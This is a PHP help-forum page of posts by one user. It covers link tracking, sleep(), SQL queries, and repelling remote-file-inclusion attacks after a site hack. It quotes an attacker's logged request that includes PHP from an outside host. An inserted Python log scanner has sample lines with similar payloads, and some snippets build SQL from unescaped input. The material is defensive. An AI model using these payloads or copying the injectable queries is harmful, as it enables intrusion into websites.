Posts posted by deansatch
-
register globals is off by default and I am using php5
-
If you are using php5, what does that matter?
How do you mean?
-
allow_url_fopen is ON. But I need it to be on for a couple of pages. I was hoping there would be some way I can switch it off in php.ini but then switch it on for my script to run, then back off again.
-
After my last successful hack, I disabled allow_url_include. I want to disable allow_url_fopen as well just to be safe, but I use file_get_contents on one part of a page. Is there a way I can just enable it for that script and disable it immediately after?
-
They keep coming back with a different ip every few seconds.
How can code like this actually work? Is there something I can alter in php.ini to make url hacks a waste of time?
-
I recently had my site hacked and managed to clear it all up. I have been checking my logs and another attempt is being made on my site using injection via the url. They are visiting my site using things like:
http://mysite.com//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://test.bigshop.cz/uploaded/two??
If you look at http://test.bigshop.cz/uploaded/two?? and view the source you can see their php code.
Is there anything I can do to stop them even trying?
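Added example, not part of the original post: a small access-log check for the request pattern quoted above, flagging query parameters whose value is a remote URL and parameters that name PHP superglobals. The log lines, IP addresses and the attacker.example host are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl

# PHP variables a request should never be able to name as a parameter.
PROTECTED = {"GLOBALS", "_REQUEST", "_GET", "_POST", "_COOKIE",
             "_SERVER", "_FILES", "_ENV", "_SESSION"}
# Values that PHP's URL wrappers would fetch if they reached include()/fopen().
REMOTE = re.compile(r"^(?:https?|ftps?|php|expect)://|^data:", re.I)
# Client address and request target from a combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return a sorted list of findings for one request target."""
    findings = set()
    query = target.partition("?")[2]
    # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        base = name.split("[", 1)[0]          # _REQUEST[option] -> _REQUEST
        if base in PROTECTED:
            findings.add("superglobal-overwrite:" + base)
        if REMOTE.match(value.strip()):
            findings.add("remote-url-value:" + name)
    return sorted(findings)

def scan(lines):
    """Return (client_ip, findings) for every log line with a finding."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if m:
            found = classify(m.group(2))
            if found:
                hits.append((m.group(1), found))
    return hits

# Constructed sample log lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2009:13:55:36 +0000] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://attacker.example/two?? HTTP/1.1" 200 512',
    '198.51.100.23 - - [10/Oct/2009:13:55:41 +0000] "GET /index.php?page=http%3A%2F%2Fattacker.example%2Fx.txt HTTP/1.1" 200 498',
    '192.0.2.15 - - [10/Oct/2009:13:56:02 +0000] "GET /page2.php?track1 HTTP/1.1" 200 1044',
    '192.0.2.15 - - [10/Oct/2009:13:56:09 +0000] "GET /index.php?pg=contact HTTP/1.1" 200 2210',
]

if __name__ == "__main__":
    for ip, found in scan(SAMPLE_LOG):
        print(ip, ", ".join(found))
```

Because the source address changes every few seconds, the findings key on the request shape rather than the IP; the same two conditions can be turned into a reject rule at the web server or at the top of the script.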
-
That will only tell me which page I am coming from, not which link I used. I would still need the query string
-
Why use the query string for tracking at all? Why not just store the value in the user's session.
Because I am trying to see which link was clicked on on a page which may have a few different links to the same page e.g. click here, sign up, and an image - I want to know which one is clicked on.
-
If it continually increases using $i++ then it will be using a loop. e.g. while, for, foreach etc...
-
That works fine for me.
-
Would that not affect my internal link SEO in a negative way though?
-
I have added a little query string to some of my links for tracking e.g. mysite.com/page2.php?track1
For fear of damaging SEO and for vanity, I want that query string to disappear when the user lands on the page. BUT, I want to echo the query string on that page. (don't ask why)
I tried using a rewrite in htaccess:
RewriteCond %{QUERY_STRING} .
RewriteRule ^(.*)page2.php$ http://mysite.com/page2.php$1? [R=301,L]
This removes it fine but it doesn't echo it out since it removes it before it gets to: echo $_SERVER["QUERY_STRING"];
Is there any way to achieve this without affecting my usually 'un-query_stringed' urls with regards to SEO?
-
They are at the bottom and when you click next, the "previous" button appears at the top - only the next button is missing from the top.
-
header("Location: yourpassword.php?CustomerID=" . $_SESSION['CustomerID'] . "");
You can't use php tags inside php.
-
How about using ajax and submitting the details of stage 1 on blur() of the final input for that stage. Something along the lines of how a username field would check for availability when moving to the password field etc...
btw- I assume by having all stages on one page you are meaning that all the form fields will be available in one go? Otherwise just store details in a session
-
Is it in there more than once?
Try:
if($count>0)
-
The only use I can imagine for sleep() is if you are limited to say 1000 emails per hour and you have written a mailing script with more than 1000 recipients you would mail 1000 then sleep() for an hour then mail another 1000 etc... But wouldn't that mean your browser would be open for hours and timeouts would still occur?
-
EITHER:
$Customer = 'Customer';
OR
$sql="SELECT Password FROM Customer WHERE Email='$Email'";
-
I haven't actually got a problem, I am working something out in theory before starting a script to get the best way to do it - i.e. huge file uploads via a browser.
I suggested sleep() as it is something I came across and wondered a) if it would help this and b) what are its uses?
-
So what use would there be for sleep() if all it does is delay the script? Surely we want our scripts to execute as quickly as possible?
-
This does nothing:
$Customer;
It makes your mysql query no table.
It should be something like this:
$Customer = 'customer_table';
EDIT: You really need to sanitise things first e.g. mysql_real_escape_string(), check valid email types etc...
-
integrate php ftp. I have never done it because I don't need it
I looked into php ftp and from what I can gather, you can't "UPLOAD" via php ftp, you can upload via http (hence my post) then use ftp to transfer it from one server to another (rendering it a pretty useless function in my eyes).
-
Notice how I capitalised "HAVE TO". If it is a site like megaupload or yousendit it would not be done via ftp. Does sleep() not pause the script and then when it restarts the timeout is set back to the beginning too?
-
With a simplified code example, would this not work?
$last = '';
$query = mysql_query("SELECT catname,product FROM table ORDER BY catname, product asc");
while ($row = mysql_fetch_assoc($query)) {
    $catname = $row['catname'];
    $product = $row['product'];
    if ($last != $catname) {
        echo "<h2>$catname</h2>";
    }
    echo "<p>$product</p>";
    $last = $catname;
}
Stopping a hack attempt - quickly
in PHP Coding Help
I'm assuming that a hacker doing these url type exploits is hoping to come across (with luck) an:
sort of thing where they have site.com?hack=http://hackerscode.txt
I noticed a lot of the attempts were using ?page=something or ?pg=something etc...
I still have no idea how they managed to succeed the last time. But they managed to plant a couple of php files that wrote new code to my index file.